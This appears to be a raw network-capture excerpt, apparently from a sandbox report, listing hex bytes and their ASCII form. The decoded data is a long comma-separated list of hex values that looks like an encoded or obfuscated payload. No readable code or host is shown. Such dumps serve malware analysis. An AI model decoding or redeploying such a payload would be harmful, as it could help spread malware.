                                                                                                                                                                      Data Ascii: 149,10f,123,12a,161,109,118,d2,13d,15d,133,d4,108,143,14b,14e,153,ff,11a,135,144,15e,9a,168,134,125,7a,132,142,143,146,153,da,d5,127,12a,157,12a,12e,121,128,147,13b,11b,10e,143,14b,14e,151,101,e6,163,14b,154,125,10f,10c,fb,121,132,138,14e,12d,e7,79,136,12
                                                                                                                                                                      2023-11-06 14:35:16 UTC447INData Raw: 66 32 2c 31 33 63 2c 31 35 34 2c 65 61 2c 31 31 37 2c 37 65 2c 31 32 37 2c 31 32 33 2c 31 32 61 2c 38 34 2c 66 36 2c 37 35 2c 31 31 32 2c 31 33 39 2c 31 35 64 2c 61 65 2c 31 30 33 2c 62 38 2c 31 30 65 2c 31 34 35 2c 31 35 38 2c 66 30 2c 64 62 2c 39 31 2c 31 32 65 2c 31 34 35 2c 31 35 65 2c 39 37 2c 31 32 32 2c 66 33 2c 64 37 2c 31 31 64 2c 31 33 32 2c 64 63 2c 31 32 33 2c 37 62 2c 31 34 36 2c 31 34 33 2c 31 33 37 2c 31 33 33 2c 31 30 61 2c 39 36 2c 31 32 34 2c 31 33 61 2c 31 32 32 2c 31 31 39 2c 31 33 61 2c 39 39 2c 31 30 63 2c 31 35 36 2c 31 34 35 2c 35 61 2c 31 30 30 2c 61 66 2c 66 32 2c 31 32 66 2c 31 36 35 2c 66 39 2c 31 30 37 2c 39 38 2c 31 33 31 2c 31 32 61 2c 31 32 35 2c 33 32 2c 66 32 2c 66 34 2c 31 31 65 2c 31 33 63 2c 31 35 36 2c 65 62 2c 65 30
                                                                                                                                                                      Data Ascii: f2,13c,154,ea,117,7e,127,123,12a,84,f6,75,112,139,15d,ae,103,b8,10e,145,158,f0,db,91,12e,145,15e,97,122,f3,d7,11d,132,dc,123,7b,146,143,137,133,10a,96,124,13a,122,119,13a,99,10c,156,145,5a,100,af,f2,12f,165,f9,107,98,131,12a,125,32,f2,f4,11e,13c,156,eb,e0
                                                                                                                                                                      2023-11-06 14:35:16 UTC463INData Raw: 66 2c 31 35 36 2c 31 31 38 2c 31 33 37 2c 35 37 2c 31 32 61 2c 63 39 2c 31 33 31 2c 31 30 66 2c 31 32 32 2c 31 31 32 2c 31 35 62 2c 61 35 2c 31 34 30 2c 31 32 62 2c 31 34 35 2c 31 35 31 2c 31 35 34 2c 62 62 2c 31 32 36 2c 31 30 34 2c 31 36 35 2c 37 64 2c 31 35 39 2c 61 34 2c 31 36 35 2c 31 30 33 2c 31 32 35 2c 33 36 2c 31 33 31 2c 61 61 2c 31 35 31 2c 31 31 35 2c 31 35 36 2c 31 32 32 2c 31 33 34 2c 39 31 2c 31 32 37 2c 31 33 30 2c 31 33 34 2c 63 61 2c 31 31 64 2c 61 37 2c 31 35 61 2c 31 30 63 2c 31 34 33 2c 36 65 2c 31 34 30 2c 62 33 2c 31 35 35 2c 31 30 32 2c 61 39 2c 31 32 36 2c 31 36 32 2c 66 61 2c 31 35 65 2c 65 62 2c 65 38 2c 64 62 2c 31 32 30 2c 64 32 2c 31 33 32 2c 66 31 2c 64 34 2c 35 62 2c 31 35 31 2c 66 38 2c 31 33 37 2c 31 32 38 2c 31 32 61 2c
                                                                                                                                                                      Data Ascii: f,156,118,137,57,12a,c9,131,10f,122,112,15b,a5,140,12b,145,151,154,bb,126,104,165,7d,159,a4,165,103,125,36,131,aa,151,115,156,122,134,91,127,130,134,ca,11d,a7,15a,10c,143,6e,140,b3,155,102,a9,126,162,fa,15e,eb,e8,db,120,d2,132,f1,d4,5b,151,f8,137,128,12a,
                                                                                                                                                                      2023-11-06 14:35:16 UTC479INData Raw: 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 63 33 2c 31 35 36 2c 39 33 2c 62 34 2c 31 31 66 2c 31 32 61 2c 31 32 63 2c 31 33 34 2c 63 31 2c 64 62 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 64 39 2c 31 34 35 2c 64 64 2c 63 63 2c 31 34 39 2c 31 32 39 2c 31 30 30 2c 31 36 35 2c 39 32 2c 31 31 37 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 61 30 2c 31 33 32 2c 36 30 2c 63 37 2c 31 33 63 2c 31 35 36 2c 31 31 34 2c 31 33 37 2c 35 61 2c 65 33 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 62 63 2c 31 35 64 2c 31 33 64 2c 64 37 2c 31 35 32 2c 31 34 35 2c 31 31 36 2c 31 35 38 2c 36 65 2c 65 32 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 62 39 2c 31 36 38 2c 65 32 2c 61 35 2c 31 31 39 2c 31 33 32 2c 31 30 64 2c 31 35 34 2c 31 34 61 2c 31
                                                                                                                                                                      Data Ascii: 23,132,142,154,c3,156,93,b4,11f,12a,12c,134,c1,db,13f,15d,13d,143,d9,145,dd,cc,149,129,100,165,92,117,13c,168,134,125,a0,132,60,c7,13c,156,114,137,5a,e3,161,134,140,122,bc,15d,13d,d7,152,145,116,158,6e,e2,135,165,14b,15e,b9,168,e2,a5,119,132,10d,154,14a,1
                                                                                                                                                                      2023-11-06 14:35:16 UTC495INData Raw: 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 63 30 2c 31 35 36 2c 61 62 2c 64 66 2c 64 36 2c 31 32 37 2c 37 37 2c 31 33 33 2c 63 30 2c 31 31 64 2c 31 33 65 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 64 62 2c 31 34 35 2c 36 35 2c 31 32 32 2c 66 34 2c 31 32 36 2c 34 62 2c 31 36 34 2c 31 33 62 2c 31 35 38 2c 31 33 62 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 61 32 2c 31 33 32 2c 36 30 2c 31 31 65 2c 31 31 30 2c 31 35 30 2c 35 65 2c 31 33 36 2c 61 64 2c 31 32 33 2c 31 36 30 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 61 65 2c 31 35 64 2c 31 31 33 2c 31 32 64 2c 31 32 30 2c 31 33 66 2c 35 65 2c 31 35 37 2c 62 62 2c 31 32 32 2c 31 33 34 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 61 36 2c 31 36 38 2c 35 32 2c 66 61 2c 65 32 2c 31 32 63 2c 35 34 2c 31 35 33 2c 37 64 2c 31 30 39 2c 31
                                                                                                                                                                      Data Ascii: ,132,142,154,c0,156,ab,df,d6,127,77,133,c0,11d,13e,15d,13d,143,db,145,65,122,f4,126,4b,164,13b,158,13b,168,134,125,a2,132,60,11e,110,150,5e,136,ad,123,160,134,140,122,ae,15d,113,12d,120,13f,5e,157,bb,122,134,165,14b,15e,a6,168,52,fa,e2,12c,54,153,7d,109,1
                                                                                                                                                                      2023-11-06 14:35:16 UTC511INData Raw: 35 34 2c 31 34 32 2c 65 66 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 62 61 2c 31 30 61 2c 35 62 2c 31 31 37 2c 31 33 33 2c 31 34 33 2c 61 64 2c 31 34 33 2c 61 33 2c 31 32 37 2c 31 35 32 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 62 61 2c 31 35 65 2c 35 61 2c 31 33 30 2c 66 35 2c 31 32 35 2c 37 34 2c 31 33 30 2c 35 61 2c 31 32 33 2c 31 34 35 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 39 33 2c 31 32 32 2c 63 33 2c 31 30 37 2c 63 30 2c 31 31 38 2c 39 30 2c 31 35 62 2c 35 64 2c 65 66 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 63 64 2c 31 31 31 2c 35 31 2c 31 31 66 2c 62 32 2c 31 35 34 2c 38 64 2c 31 36 36 2c 31 32 38 2c 66 33 2c 31 32 32 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 63 30 2c 31 33 65 2c 36 35 2c 66 31 2c 37 37 2c 31 32 30 2c 61 66 2c 31 33
                                                                                                                                                                      Data Ascii: 54,142,ef,129,12a,161,134,ba,10a,5b,117,133,143,ad,143,a3,127,152,129,135,165,ba,15e,5a,130,f5,125,74,130,5a,123,145,156,149,137,93,122,c3,107,c0,118,90,15b,5d,ef,15c,145,14b,158,cd,111,51,11f,b2,154,8d,166,128,f3,122,132,142,154,c0,13e,65,f1,77,120,af,13
                                                                                                                                                                      2023-11-06 14:35:16 UTC527INData Raw: 33 61 2c 31 36 38 2c 64 35 2c 64 65 2c 31 32 33 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 63 64 2c 31 31 38 2c 31 34 39 2c 31 33 37 2c 31 32 37 2c 31 32 61 2c 31 30 32 2c 65 64 2c 31 34 30 2c 31 32 32 2c 31 33 63 2c 31 35 64 2c 31 34 33 2c 31 31 36 2c 31 35 63 2c 31 34 35 2c 31 34 61 2c 31 35 38 2c 66 34 2c 65 32 2c 31 33 35 2c 31 36 35 2c 31 34 61 2c 31 35 65 2c 64 64 2c 31 32 31 2c 31 33 34 2c 31 32 35 2c 31 32 31 2c 31 33 32 2c 31 34 38 2c 31 32 37 2c 31 34 36 2c 31 35 36 2c 31 34 38 2c 31 33 37 2c 63 61 2c 65 33 2c 31 36 31 2c 31 33 34 2c 31 33 66 2c 31 32 32 2c 65 30 2c 31 31 36 2c 31 33 64 2c 31 34 33 2c 31 35 61 2c 31 34 35 2c 31 35 31 2c 31 32 62 2c 31 35 33 2c 31 32 39 2c 31 33 34 2c 31 36 35 2c 64 32 2c 31 32 30 2c 31 33 63 2c 31 36 38 2c 31 33 32
                                                                                                                                                                      Data Ascii: 3a,168,d5,de,123,132,141,154,cd,118,149,137,127,12a,102,ed,140,122,13c,15d,143,116,15c,145,14a,158,f4,e2,135,165,14a,15e,dd,121,134,125,121,132,148,127,146,156,148,137,ca,e3,161,134,13f,122,e0,116,13d,143,15a,145,151,12b,153,129,134,165,d2,120,13c,168,132
                                                                                                                                                                      2023-11-06 14:35:16 UTC543INData Raw: 36 31 2c 31 33 34 2c 31 33 66 2c 31 32 32 2c 31 33 61 2c 31 34 31 2c 31 33 64 2c 31 34 33 2c 31 35 61 2c 31 34 35 2c 63 30 2c 31 32 38 2c 31 35 33 2c 31 32 39 2c 31 33 32 2c 31 36 35 2c 31 30 65 2c 31 32 37 2c 31 33 63 2c 31 36 38 2c 31 33 30 2c 31 32 35 2c 66 35 2c 66 62 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 31 34 34 2c 31 31 62 2c 31 32 39 2c 31 32 61 2c 31 35 66 2c 31 33 34 2c 31 32 31 2c 63 35 2c 31 33 66 2c 31 35 64 2c 31 33 61 2c 31 34 33 2c 31 30 65 2c 31 31 35 2c 31 34 62 2c 31 35 38 2c 31 35 32 2c 31 32 39 2c 31 33 30 2c 31 34 39 2c 31 34 62 2c 31 35 65 2c 31 33 61 2c 31 36 38 2c 35 36 2c 65 32 2c 31 32 33 2c 31 33 32 2c 31 33 66 2c 31 35 34 2c 39 30 2c 66 39 2c 31 34 39 2c 31 33 37 2c 31 32 35 2c 31 32 61 2c 31 33 63 2c 64 33 2c 31
                                                                                                                                                                      Data Ascii: 61,134,13f,122,13a,141,13d,143,15a,145,c0,128,153,129,132,165,10e,127,13c,168,130,125,f5,fb,142,154,145,156,144,11b,129,12a,15f,134,121,c5,13f,15d,13a,143,10e,115,14b,158,152,129,130,149,14b,15e,13a,168,56,e2,123,132,13f,154,90,f9,149,137,125,12a,13c,d3,1
                                                                                                                                                                      2023-11-06 14:35:16 UTC559INData Raw: 35 34 2c 31 33 66 2c 31 32 64 2c 66 38 2c 62 32 2c 31 33 37 2c 36 61 2c 31 32 35 2c 62 63 2c 31 34 38 2c 66 38 2c 31 35 62 2c 62 33 2c 31 36 34 2c 61 38 2c 31 32 31 2c 38 62 2c 66 65 2c 31 34 31 2c 31 35 30 2c 36 66 2c 31 30 34 2c 61 35 2c 31 30 33 2c 34 30 2c 31 32 35 2c 31 35 32 2c 31 31 65 2c 39 32 2c 65 65 2c 35 36 2c 31 35 38 2c 65 62 2c 31 31 65 2c 36 62 2c 31 31 64 2c 62 61 2c 31 35 37 2c 38 36 2c 64 37 2c 38 31 2c 31 33 31 2c 61 32 2c 31 35 64 2c 63 61 2c 31 34 32 2c 31 32 61 2c 31 32 35 2c 31 30 32 2c 31 33 31 2c 38 61 2c 31 33 64 2c 38 30 2c 31 32 32 2c 61 30 2c 31 33 36 2c 39 32 2c 64 37 2c 31 35 31 2c 31 33 33 2c 35 37 2c 31 32 31 2c 31 31 65 2c 66 63 2c 36 66 2c 31 30 66 2c 62 33 2c 31 34 34 2c 61 32 2c 31 32 35 2c 36 64 2c 31 31 39 2c 35 63
                                                                                                                                                                      Data Ascii: 54,13f,12d,f8,b2,137,6a,125,bc,148,f8,15b,b3,164,a8,121,8b,fe,141,150,6f,104,a5,103,40,125,152,11e,92,ee,56,158,eb,11e,6b,11d,ba,157,86,d7,81,131,a2,15d,ca,142,12a,125,102,131,8a,13d,80,122,a0,136,92,d7,151,133,57,121,11e,fc,6f,10f,b3,144,a2,125,6d,119,5c
                                                                                                                                                                      2023-11-06 14:35:16 UTC575INData Raw: 31 31 36 2c 34 61 2c 31 36 34 2c 63 38 2c 31 34 35 2c 62 33 2c 31 35 35 2c 31 33 31 2c 31 32 33 2c 64 38 2c 31 31 34 2c 39 39 2c 31 34 31 2c 35 62 2c 31 35 35 2c 63 36 2c 31 31 65 2c 38 30 2c 31 31 37 2c 31 35 65 2c 31 33 32 2c 39 35 2c 31 30 34 2c 37 36 2c 31 34 61 2c 35 32 2c 31 34 32 2c 64 39 2c 31 32 63 2c 38 32 2c 31 34 35 2c 31 35 30 2c 31 32 37 2c 38 61 2c 31 34 37 2c 36 32 2c 31 34 62 2c 35 31 2c 31 36 37 2c 62 31 2c 31 30 63 2c 33 61 2c 31 31 66 2c 31 33 66 2c 31 35 32 2c 35 35 2c 31 33 38 2c 31 34 30 2c 31 32 33 2c 33 65 2c 31 32 39 2c 64 65 2c 31 31 62 2c 31 33 37 2c 31 30 65 2c 31 33 63 2c 31 35 62 2c 66 31 2c 31 32 34 2c 31 31 62 2c 31 33 30 2c 62 38 2c 31 35 37 2c 31 34 35 2c 31 32 39 2c 66 34 2c 31 35 30 2c 61 38 2c 31 35 64 2c 31 33 33 2c
                                                                                                                                                                      Data Ascii: 116,4a,164,c8,145,b3,155,131,123,d8,114,99,141,5b,155,c6,11e,80,117,15e,132,95,104,76,14a,52,142,d9,12c,82,145,150,127,8a,147,62,14b,51,167,b1,10c,3a,11f,13f,152,55,138,140,123,3e,129,de,11b,137,10e,13c,15b,f1,124,11b,130,b8,157,145,129,f4,150,a8,15d,133,
                                                                                                                                                                      2023-11-06 14:35:16 UTC591INData Raw: 31 32 64 2c 31 36 32 2c 31 33 34 2c 31 35 61 2c 31 33 63 2c 31 36 38 2c 65 64 2c 31 32 30 2c 38 66 2c 31 32 66 2c 31 34 32 2c 31 35 34 2c 35 66 2c 31 35 31 2c 66 66 2c 31 32 64 2c 31 32 39 2c 31 32 61 2c 61 31 2c 31 32 64 2c 61 63 2c 31 31 66 2c 31 33 66 2c 31 35 64 2c 31 33 35 2c 31 34 30 2c 63 38 2c 31 34 32 2c 31 34 62 2c 31 35 38 2c 31 30 63 2c 31 32 34 2c 61 31 2c 31 36 32 2c 31 34 62 2c 31 35 65 2c 35 35 2c 31 36 33 2c 61 30 2c 31 32 32 2c 31 32 33 2c 31 33 32 2c 38 32 2c 31 34 64 2c 62 32 2c 31 35 33 2c 31 34 39 2c 31 33 37 2c 65 33 2c 31 32 32 2c 63 64 2c 31 33 31 2c 31 34 30 2c 31 32 32 2c 36 36 2c 31 35 34 2c 61 39 2c 31 34 30 2c 31 35 63 2c 31 34 35 2c 31 33 32 2c 31 34 65 2c 66 31 2c 31 31 66 2c 31 33 35 2c 31 36 35 2c 61 37 2c 31 35 33 2c 61
                                                                                                                                                                      Data Ascii: 12d,162,134,15a,13c,168,ed,120,8f,12f,142,154,5f,151,ff,12d,129,12a,a1,12d,ac,11f,13f,15d,135,140,c8,142,14b,158,10c,124,a1,162,14b,15e,55,163,a0,122,123,132,82,14d,b2,153,149,137,e3,122,cd,131,140,122,66,154,a9,140,15c,145,132,14e,f1,11f,135,165,a7,153,a
                                                                                                                                                                      2023-11-06 14:35:16 UTC607INData Raw: 64 31 2c 66 62 2c 63 63 2c 31 30 32 2c 65 61 2c 65 61 2c 62 35 2c 65 31 2c 65 63 2c 64 62 2c 66 39 2c 65 39 2c 66 66 2c 62 61 2c 63 30 2c 65 36 2c 66 65 2c 31 31 32 2c 31 35 34 2c 31 30 33 2c 31 32 36 2c 31 34 39 2c 65 64 2c 66 39 2c 31 32 61 2c 31 30 64 2c 31 30 34 2c 31 34 30 2c 65 36 2c 31 30 31 2c 31 32 34 2c 64 65 2c 65 34 2c 31 32 63 2c 65 36 2c 31 31 62 2c 31 35 38 2c 31 31 37 2c 65 30 2c 64 31 2c 31 33 34 2c 31 30 64 2c 66 63 2c 64 64 2c 31 30 39 2c 31 30 34 2c 63 36 2c 66 33 2c 31 33 32 2c 31 30 36 2c 66 64 2c 64 34 2c 65 64 2c 64 35 2c 64 32 2c 64 64 2c 63 31 2c 66 33 2c 63 66 2c 31 30 32 2c 63 30 2c 65 30 2c 66 65 2c 31 30 64 2c 65 34 2c 31 32 63 2c 31 34 35 2c 31 30 66 2c 31 32 61 2c 66 30 2c 62 35 2c 63 36 2c 66 33 2c 31 30 64 2c 66 63 2c 64
                                                                                                                                                                      Data Ascii: d1,fb,cc,102,ea,ea,b5,e1,ec,db,f9,e9,ff,ba,c0,e6,fe,112,154,103,126,149,ed,f9,12a,10d,104,140,e6,101,124,de,e4,12c,e6,11b,158,117,e0,d1,134,10d,fc,dd,109,104,c6,f3,132,106,fd,d4,ed,d5,d2,dd,c1,f3,cf,102,c0,e0,fe,10d,e4,12c,145,10f,12a,f0,b5,c6,f3,10d,fc,d
                                                                                                                                                                      2023-11-06 14:35:16 UTC623INData Raw: 2c 65 63 2c 66 66 2c 31 35 33 2c 62 36 2c 64 32 2c 31 30 34 2c 64 66 2c 66 39 2c 65 33 2c 31 36 38 2c 63 35 2c 62 66 2c 62 64 2c 62 66 2c 64 64 2c 65 30 2c 65 64 2c 31 35 36 2c 66 36 2c 66 35 2c 63 61 2c 65 32 2c 31 31 32 2c 65 32 2c 65 36 2c 31 32 32 2c 63 39 2c 66 63 2c 64 31 2c 63 65 2c 66 37 2c 65 36 2c 65 63 2c 31 35 38 2c 65 63 2c 63 34 2c 63 31 2c 31 30 36 2c 66 34 2c 65 66 2c 63 61 2c 66 64 2c 63 62 2c 62 37 2c 62 63 2c 66 31 2c 64 30 2c 65 66 2c 65 35 2c 31 35 36 2c 66 32 2c 63 38 2c 62 37 2c 62 66 2c 31 32 30 2c 63 32 2c 64 62 2c 63 31 2c 31 33 66 2c 65 36 2c 63 65 2c 64 31 2c 66 31 2c 31 30 34 2c 64 39 2c 66 33 2c 66 32 2c 31 32 39 2c 65 38 2c 66 63 2c 64 64 2c 66 35 2c 63 66 2c 66 33 2c 63 37 2c 65 34 2c 62 37 2c 63 32 2c 64 61 2c 66 33 2c 31
                                                                                                                                                                      Data Ascii: ,ec,ff,153,b6,d2,104,df,f9,e3,168,c5,bf,bd,bf,dd,e0,ed,156,f6,f5,ca,e2,112,e2,e6,122,c9,fc,d1,ce,f7,e6,ec,158,ec,c4,c1,106,f4,ef,ca,fd,cb,b7,bc,f1,d0,ef,e5,156,f2,c8,b7,bf,120,c2,db,c1,13f,e6,ce,d1,f1,104,d9,f3,f2,129,e8,fc,dd,f5,cf,f3,c7,e4,b7,c2,da,f3,1
                                                                                                                                                                      2023-11-06 14:35:16 UTC639INData Raw: 63 2c 63 66 2c 63 39 2c 63 65 2c 65 38 2c 65 31 2c 31 31 35 2c 64 35 2c 63 33 2c 62 37 2c 63 31 2c 66 66 2c 62 66 2c 63 63 2c 62 64 2c 31 33 66 2c 31 30 65 2c 64 62 2c 64 30 2c 65 64 2c 64 39 2c 65 36 2c 65 34 2c 65 65 2c 65 38 2c 63 31 2c 66 31 2c 64 39 2c 66 35 2c 64 61 2c 66 33 2c 63 30 2c 63 30 2c 31 32 33 2c 66 31 2c 63 66 2c 65 31 2c 65 31 2c 65 39 2c 65 37 2c 63 62 2c 62 30 2c 64 36 2c 65 66 2c 64 33 2c 64 63 2c 62 64 2c 64 32 2c 66 63 2c 63 62 2c 64 38 2c 31 31 62 2c 64 31 2c 64 37 2c 65 36 2c 65 61 2c 63 37 2c 63 30 2c 66 31 2c 65 36 2c 31 35 65 2c 65 38 2c 31 30 37 2c 63 32 2c 62 65 2c 62 65 2c 62 65 2c 66 63 2c 65 32 2c 65 35 2c 65 39 2c 65 34 2c 63 30 2c 62 61 2c 62 38 2c 66 36 2c 66 33 2c 63 63 2c 61 65 2c 63 64 2c 66 34 2c 64 62 2c 63 65 2c
                                                                                                                                                                      Data Ascii: c,cf,c9,ce,e8,e1,115,d5,c3,b7,c1,ff,bf,cc,bd,13f,10e,db,d0,ed,d9,e6,e4,ee,e8,c1,f1,d9,f5,da,f3,c0,c0,123,f1,cf,e1,e1,e9,e7,cb,b0,d6,ef,d3,dc,bd,d2,fc,cb,d8,11b,d1,d7,e6,ea,c7,c0,f1,e6,15e,e8,107,c2,be,be,be,fc,e2,e5,e9,e4,c0,ba,b8,f6,f3,cc,ae,cd,f4,db,ce,
                                                                                                                                                                      2023-11-06 14:35:16 UTC655INData Raw: 37 2c 62 33 2c 64 31 2c 31 35 64 2c 64 37 2c 31 30 31 2c 65 33 2c 66 35 2c 64 63 2c 65 35 2c 65 61 2c 62 35 2c 63 63 2c 66 36 2c 64 64 2c 31 35 65 2c 65 39 2c 31 30 33 2c 64 33 2c 62 33 2c 63 30 2c 63 61 2c 66 33 2c 65 34 2c 64 32 2c 65 64 2c 64 61 2c 63 39 2c 31 32 39 2c 62 37 2c 66 63 2c 64 33 2c 63 65 2c 62 66 2c 64 37 2c 31 30 65 2c 63 64 2c 63 66 2c 66 33 2c 64 36 2c 64 64 2c 31 35 38 2c 31 31 32 2c 62 37 2c 63 65 2c 66 30 2c 64 65 2c 66 39 2c 63 65 2c 66 34 2c 65 35 2c 62 30 2c 61 66 2c 65 33 2c 64 63 2c 31 30 32 2c 65 35 2c 65 38 2c 65 32 2c 64 32 2c 65 34 2c 62 32 2c 66 65 2c 63 66 2c 64 30 2c 61 65 2c 64 36 2c 65 65 2c 63 66 2c 31 34 33 2c 31 31 38 2c 65 34 2c 64 37 2c 66 37 2c 31 30 37 2c 63 34 2c 63 37 2c 66 65 2c 64 37 2c 66 36 2c 66 37 2c 66
                                                                                                                                                                      Data Ascii: 7,b3,d1,15d,d7,101,e3,f5,dc,e5,ea,b5,cc,f6,dd,15e,e9,103,d3,b3,c0,ca,f3,e4,d2,ed,da,c9,129,b7,fc,d3,ce,bf,d7,10e,cd,cf,f3,d6,dd,158,112,b7,ce,f0,de,f9,ce,f4,e5,b0,af,e3,dc,102,e5,e8,e2,d2,e4,b2,fe,cf,d0,ae,d6,ee,cf,143,118,e4,d7,f7,107,c4,c7,fe,d7,f6,f7,f
                                                                                                                                                                      2023-11-06 14:35:16 UTC671INData Raw: 2c 65 33 2c 31 34 39 2c 64 30 2c 63 34 2c 62 36 2c 31 30 32 2c 66 33 2c 64 63 2c 62 65 2c 63 64 2c 66 38 2c 63 61 2c 64 30 2c 31 35 63 2c 31 30 30 2c 64 64 2c 66 34 2c 65 33 2c 62 61 2c 63 63 2c 66 37 2c 64 37 2c 31 31 64 2c 64 38 2c 31 30 34 2c 63 32 2c 63 30 2c 62 30 2c 62 66 2c 31 34 32 2c 66 33 2c 65 32 2c 66 32 2c 64 37 2c 64 32 2c 62 36 2c 62 37 2c 31 36 31 2c 65 62 2c 64 32 2c 64 32 2c 63 64 2c 65 65 2c 64 36 2c 64 31 2c 66 37 2c 64 32 2c 64 38 2c 31 35 38 2c 31 30 30 2c 62 30 2c 63 32 2c 66 31 2c 65 36 2c 66 31 2c 31 30 65 2c 31 31 61 2c 63 66 2c 62 31 2c 66 35 2c 64 66 2c 64 33 2c 66 31 2c 64 62 2c 66 31 2c 64 35 2c 63 34 2c 31 32 39 2c 65 39 2c 66 35 2c 63 38 2c 65 39 2c 63 31 2c 64 33 2c 66 31 2c 64 38 2c 63 66 2c 65 39 2c 31 34 35 2c 64 64 2c
                                                                                                                                                                      Data Ascii: ,e3,149,d0,c4,b6,102,f3,dc,be,cd,f8,ca,d0,15c,100,dd,f4,e3,ba,cc,f7,d7,11d,d8,104,c2,c0,b0,bf,142,f3,e2,f2,d7,d2,b6,b7,161,eb,d2,d2,cd,ee,d6,d1,f7,d2,d8,158,100,b0,c2,f1,e6,f1,10e,11a,cf,b1,f5,df,d3,f1,db,f1,d5,c4,129,e9,f5,c8,e9,c1,d3,f1,d8,cf,e9,145,dd,
                                                                                                                                                                      2023-11-06 14:35:16 UTC687INData Raw: 38 35 2c 36 30 2c 64 34 2c 39 63 2c 37 34 2c 63 39 2c 38 61 2c 34 37 2c 61 39 2c 62 35 2c 35 32 2c 62 66 2c 37 37 2c 35 64 2c 64 63 2c 38 65 2c 36 31 2c 64 62 2c 39 37 2c 36 39 2c 64 37 2c 61 39 2c 34 37 2c 62 34 2c 62 39 2c 36 39 2c 64 64 2c 39 30 2c 38 36 2c 62 33 2c 37 37 2c 34 31 2c 62 31 2c 39 36 2c 37 32 2c 63 35 2c 61 37 2c 36 37 2c 62 37 2c 39 65 2c 34 38 2c 65 30 2c 38 39 2c 35 65 2c 61 32 2c 62 33 2c 37 62 2c 62 64 2c 39 37 2c 37 61 2c 63 34 2c 39 64 2c 37 36 2c 64 32 2c 37 66 2c 35 33 2c 65 34 2c 39 65 2c 37 63 2c 62 63 2c 64 62 2c 35 32 2c 61 34 2c 37 39 2c 35 30 2c 63 32 2c 61 37 2c 36 34 2c 64 35 2c 39 66 2c 35 35 2c 61 39 2c 37 64 2c 37 66 2c 62 34 2c 39 36 2c 34 30 2c 62 66 2c 62 31 2c 35 62 2c 63 32 2c 62 32 2c 36 33 2c 63 62 2c 61 62 2c
                                                                                                                                                                      Data Ascii: 85,60,d4,9c,74,c9,8a,47,a9,b5,52,bf,77,5d,dc,8e,61,db,97,69,d7,a9,47,b4,b9,69,dd,90,86,b3,77,41,b1,96,72,c5,a7,67,b7,9e,48,e0,89,5e,a2,b3,7b,bd,97,7a,c4,9d,76,d2,7f,53,e4,9e,7c,bc,db,52,a4,79,50,c2,a7,64,d5,9f,55,a9,7d,7f,b4,96,40,bf,b1,5b,c2,b2,63,cb,ab,
                                                                                                                                                                      2023-11-06 14:35:16 UTC703INData Raw: 2c 37 66 2c 34 38 2c 65 31 2c 61 35 2c 35 65 2c 61 32 2c 39 31 2c 37 62 2c 62 64 2c 62 37 2c 37 61 2c 63 35 2c 39 65 2c 37 36 2c 64 33 2c 37 66 2c 35 33 2c 65 35 2c 62 65 2c 37 63 2c 62 62 2c 62 61 2c 35 32 2c 61 34 2c 37 38 2c 35 30 2c 63 31 2c 61 61 2c 36 34 2c 64 36 2c 62 62 2c 35 35 2c 61 39 2c 39 66 2c 37 66 2c 62 34 2c 39 33 2c 34 30 2c 62 66 2c 61 66 2c 35 62 2c 63 32 2c 61 64 2c 36 33 2c 63 62 2c 63 63 2c 37 31 2c 61 39 2c 38 62 2c 38 33 2c 63 62 2c 64 32 2c 35 61 2c 65 37 2c 38 61 2c 34 33 2c 61 32 2c 38 34 2c 36 30 2c 64 34 2c 62 61 2c 37 34 2c 63 38 2c 38 62 2c 34 37 2c 61 61 2c 62 35 2c 35 32 2c 62 66 2c 37 36 2c 35 64 2c 64 64 2c 38 66 2c 36 31 2c 64 62 2c 39 62 2c 36 39 2c 64 38 2c 63 38 2c 34 37 2c 62 35 2c 62 62 2c 36 39 2c 64 64 2c 38 65
                                                                                                                                                                      Data Ascii: ,7f,48,e1,a5,5e,a2,91,7b,bd,b7,7a,c5,9e,76,d3,7f,53,e5,be,7c,bb,ba,52,a4,78,50,c1,aa,64,d6,bb,55,a9,9f,7f,b4,93,40,bf,af,5b,c2,ad,63,cb,cc,71,a9,8b,83,cb,d2,5a,e7,8a,43,a2,84,60,d4,ba,74,c8,8b,47,aa,b5,52,bf,76,5d,dd,8f,61,db,9b,69,d8,c8,47,b5,bb,69,dd,8e
                                                                                                                                                                      2023-11-06 14:35:16 UTC719INData Raw: 66 2c 62 33 2c 35 62 2c 63 33 2c 62 30 2c 36 33 2c 63 62 2c 63 61 2c 37 31 2c 61 39 2c 38 62 2c 38 33 2c 63 61 2c 62 31 2c 35 61 2c 65 38 2c 38 37 2c 34 33 2c 61 33 2c 38 35 2c 36 30 2c 64 33 2c 39 61 2c 37 34 2c 63 39 2c 38 63 2c 34 37 2c 61 61 2c 62 34 2c 35 32 2c 63 30 2c 39 34 2c 35 64 2c 64 63 2c 39 32 2c 36 31 2c 64 63 2c 62 36 2c 36 39 2c 64 38 2c 61 37 2c 34 37 2c 62 35 2c 64 36 2c 36 39 2c 64 64 2c 39 30 2c 38 36 2c 62 33 2c 37 38 2c 34 31 2c 62 32 2c 62 34 2c 37 32 2c 63 35 2c 61 37 2c 36 37 2c 62 37 2c 37 65 2c 34 38 2c 65 31 2c 38 39 2c 35 65 2c 61 32 2c 62 31 2c 37 62 2c 62 64 2c 62 35 2c 37 61 2c 63 35 2c 62 66 2c 37 36 2c 64 33 2c 39 61 2c 35 33 2c 65 34 2c 39 66 2c 37 63 2c 62 62 2c 62 61 2c 35 32 2c 61 34 2c 37 38 2c 35 30 2c 63 31 2c 61
